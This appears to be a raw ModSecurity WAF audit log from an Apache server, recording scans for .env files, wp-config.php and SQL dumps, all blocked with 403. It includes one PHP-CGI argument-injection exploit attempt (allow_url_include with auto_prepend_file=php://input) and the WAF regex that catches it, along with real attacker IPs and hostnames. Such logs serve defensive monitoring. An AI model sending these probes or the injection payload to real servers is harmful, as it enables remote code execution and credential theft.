Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744628744833849 885 (- - -) Stopwatch2: 1744628744833849 885; combined=327, p1=291, p2=0, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00eb3d51-Z-- --6f753d54-A-- [14/Apr/2025:18:06:00 +0700] Z_zsGNPxEtam20ggC7hEIQAAAIw 103.236.140.4 34980 103.236.140.4 8181 --6f753d54-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 128.199.182.55 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 128.199.182.55 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --6f753d54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f753d54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744628760452923 914 (- - -) Stopwatch2: 1744628760452923 914; combined=442, p1=404, p2=0, p3=0, p4=0, p5=37, sr=169, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f753d54-Z-- --caa2db6a-A-- [14/Apr/2025:18:18:40 +0700] Z_zvENPxEtam20ggC7hEMQAAAJI 103.236.140.4 35050 103.236.140.4 8181 --caa2db6a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.214.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.214.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --caa2db6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --caa2db6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744629520643866 826 (- - -) Stopwatch2: 1744629520643866 826; combined=334, p1=298, p2=0, p3=0, p4=0, p5=36, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --caa2db6a-Z-- --64222a5d-A-- [14/Apr/2025:18:28:24 +0700] Z_zxWNPxEtam20ggC7hFEwAAAJU 103.236.140.4 36212 103.236.140.4 8181 --64222a5d-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.233.57 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 188.166.233.57 Accept-Encoding: gzip X-Varnish: 126481787 --64222a5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --64222a5d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630104116315 693 (- - -) Stopwatch2: 1744630104116315 693; combined=248, p1=221, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64222a5d-Z-- --5562a71d-A-- [14/Apr/2025:18:28:24 +0700] Z_zxWNga3eJwvi_gLpI9WAAAAFM 103.236.140.4 36216 103.236.140.4 8181 --5562a71d-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.233.57 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 188.166.233.57 Accept-Encoding: gzip X-Varnish: 126694405 --5562a71d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5562a71d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630104167486 824 (- - -) Stopwatch2: 1744630104167486 824; combined=340, p1=309, p2=0, p3=0, p4=0, p5=31, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5562a71d-Z-- --120f3464-A-- [14/Apr/2025:18:32:23 +0700] Z_zyR4gxSXM4jtK9zHGL3gAAAMk 103.236.140.4 37888 103.236.140.4 8181 --120f3464-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.182.44 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.182.44 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --120f3464-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --120f3464-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630343680505 699 (- - -) Stopwatch2: 1744630343680505 699; combined=295, p1=258, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --120f3464-Z-- --36090c6e-A-- [14/Apr/2025:18:32:24 +0700] Z_zySFpzfFgMsbYwm2Kf1wAAABE 103.236.140.4 37898 103.236.140.4 8181 --36090c6e-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.182.44 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.182.44 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --36090c6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36090c6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630344367803 744 (- - -) Stopwatch2: 1744630344367803 744; combined=314, p1=257, p2=0, p3=0, p4=0, p5=57, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36090c6e-Z-- --b74c8c65-A-- [14/Apr/2025:18:32:24 +0700] Z_zySIgxSXM4jtK9zHGL4QAAAM8 103.236.140.4 37900 103.236.140.4 8181 --b74c8c65-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.182.44 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.182.44 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b74c8c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b74c8c65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630344411841 736 (- - -) Stopwatch2: 1744630344411841 736; combined=333, p1=298, p2=0, p3=0, p4=0, p5=35, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b74c8c65-Z-- --db71b261-A-- [14/Apr/2025:18:32:25 +0700] Z_zySVpzfFgMsbYwm2Kf2AAAABI 103.236.140.4 37906 103.236.140.4 8181 --db71b261-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.182.44 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.182.44 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --db71b261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db71b261-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630345063465 631 (- - -) Stopwatch2: 1744630345063465 631; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db71b261-Z-- --260cb90f-A-- [14/Apr/2025:18:32:25 +0700] Z_zySVpzfFgMsbYwm2Kf2QAAABU 103.236.140.4 37908 103.236.140.4 8181 --260cb90f-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.182.44 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.182.44 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --260cb90f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --260cb90f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630345112028 634 (- - -) Stopwatch2: 1744630345112028 634; combined=264, p1=236, p2=0, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --260cb90f-Z-- --baadc319-A-- [14/Apr/2025:18:43:10 +0700] Z_z0ztga3eJwvi_gLpI-rgAAAEc 103.236.140.4 40472 103.236.140.4 8181 --baadc319-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 188.166.233.57 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 188.166.233.57 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --baadc319-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --baadc319-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630990201756 760 (- - -) Stopwatch2: 1744630990201756 760; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --baadc319-Z-- --c2850d6c-A-- [14/Apr/2025:18:43:10 +0700] Z_z0ztga3eJwvi_gLpI-rwAAAEU 103.236.140.4 40474 103.236.140.4 8181 --c2850d6c-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 188.166.233.57 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 188.166.233.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c2850d6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2850d6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744630990222587 760 (- - -) Stopwatch2: 1744630990222587 760; combined=347, p1=313, p2=0, p3=0, p4=0, p5=34, sr=155, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2850d6c-Z-- --c056e134-A-- [14/Apr/2025:20:35:10 +0700] Z_0PDlpzfFgMsbYwm2KgrgAAAA0 103.236.140.4 43342 103.236.140.4 8181 --c056e134-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 167.172.232.142 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 167.172.232.142 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c056e134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c056e134-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744637710376740 668 (- - -) Stopwatch2: 1744637710376740 668; combined=256, p1=220, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c056e134-Z-- --56a28560-A-- [14/Apr/2025:22:15:12 +0700] Z_0mgNPxEtam20ggC7hGfwAAAIE 103.236.140.4 44126 103.236.140.4 8181 --56a28560-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36 Accept-Charset: utf-8 --56a28560-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56a28560-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744643712142497 818 (- - -) Stopwatch2: 1744643712142497 818; combined=340, p1=304, p2=0, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56a28560-Z-- --228d2c48-A-- [14/Apr/2025:22:18:44 +0700] Z_0nVIgxSXM4jtK9zHGOYQAAANE 103.236.140.4 44168 103.236.140.4 8181 --228d2c48-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.154.143.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.154.143.162 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --228d2c48-C-- --228d2c48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --228d2c48-E-- --228d2c48-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744643924381445 5265 (- - -) Stopwatch2: 1744643924381445 5265; combined=3192, p1=512, p2=2638, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --228d2c48-Z-- --18b3af0d-A-- [14/Apr/2025:22:48:50 +0700] Z_0uYlpzfFgMsbYwm2KhMAAAABU 103.236.140.4 44476 103.236.140.4 8181 --18b3af0d-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 143.110.213.72 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 143.110.213.72 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --18b3af0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18b3af0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744645730897197 847 (- - -) Stopwatch2: 1744645730897197 847; combined=317, p1=288, p2=0, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18b3af0d-Z-- --85e43a7e-A-- [14/Apr/2025:22:59:56 +0700] Z_0w_NPxEtam20ggC7hGkQAAAIs 103.236.140.4 44548 103.236.140.4 8181 --85e43a7e-B-- GET /bd.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 2.58.56.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 2.58.56.43 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --85e43a7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85e43a7e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646396617198 2686 (- - -) Stopwatch2: 1744646396617198 2686; combined=952, p1=423, p2=499, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85e43a7e-Z-- --10b28f2c-A-- [14/Apr/2025:22:59:58 +0700] Z_0w_tPxEtam20ggC7hGkgAAAI4 103.236.140.4 44550 103.236.140.4 8181 --10b28f2c-B-- GET /newbase.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.141.215.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.141.215.21 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --10b28f2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10b28f2c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646398281940 3071 (- - -) Stopwatch2: 1744646398281940 3071; combined=1118, p1=586, p2=501, p3=0, p4=0, p5=31, sr=183, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10b28f2c-Z-- --eb737304-A-- [14/Apr/2025:22:59:59 +0700] Z_0w_9PxEtam20ggC7hGkwAAAIo 103.236.140.4 44552 103.236.140.4 8181 --eb737304-B-- GET /installer.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --eb737304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb737304-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646399133193 2414 (- - -) Stopwatch2: 1744646399133193 2414; combined=858, p1=450, p2=379, p3=0, p4=0, p5=29, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
